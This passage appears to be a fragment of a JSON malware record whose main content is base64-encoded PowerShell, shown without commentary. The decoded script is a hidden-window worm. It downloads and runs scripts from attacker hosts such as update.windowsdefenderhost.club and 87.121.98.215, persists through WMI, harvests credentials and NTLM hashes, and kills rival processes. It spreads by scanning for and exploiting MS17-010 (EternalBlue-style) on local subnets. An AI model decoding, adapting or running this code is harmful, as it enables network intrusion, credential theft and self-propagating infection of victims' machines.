BpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkA